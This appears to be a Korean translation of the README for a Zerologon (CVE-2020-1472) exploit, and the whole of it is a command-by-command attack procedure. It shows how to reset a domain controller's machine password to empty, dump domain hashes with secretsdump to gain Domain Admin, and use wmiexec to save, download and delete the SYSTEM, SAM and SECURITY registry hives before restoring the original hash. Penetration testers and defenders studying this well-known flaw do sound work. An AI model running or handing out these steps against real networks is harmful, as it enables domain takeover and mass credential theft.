
zerologon cve-2020-1472 익스플로잇
익스플로잇 코드는 https://www.secura.com/blog/zero-logon 및 https://github.com/SecuraBV/CVE-2020-1472 를 기반으로 합니다. 원본 연구 및 스캐너는 Secura, 수정은 RiskSense Inc.가 담당했습니다.
익스플로잇을 위해, 기존에 설치된 Impacket을 모두 제거하고 https://github.com/SecureAuthCorp/impacket/commit/b867b21 또는 그 이상 버전의 Impacket을 설치하세요. 그런 다음 다음을 실행합니다:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
성공하면 다음을 수행할 수 있습니다:
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'
이렇게 하면 Domain Admin 권한을 얻을 수 있습니다. 그런 다음 secretsdump에서 얻은 자격 증명으로 wmiexec.py를 대상 DC에 대해 실행하고 다음을 수행합니다:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
그런 다음 다음을 실행할 수 있습니다:
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
그러면 시스템 계정의 원래 NT 해시가 표시됩니다. 그런 다음 다음 명령으로 해당 원래 시스템 계정 해시를 도메인에 재설치할 수 있습니다:
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
원래 해시를 재설치하는 것은 DC가 정상적으로 작동을 계속하기 위해 필요합니다.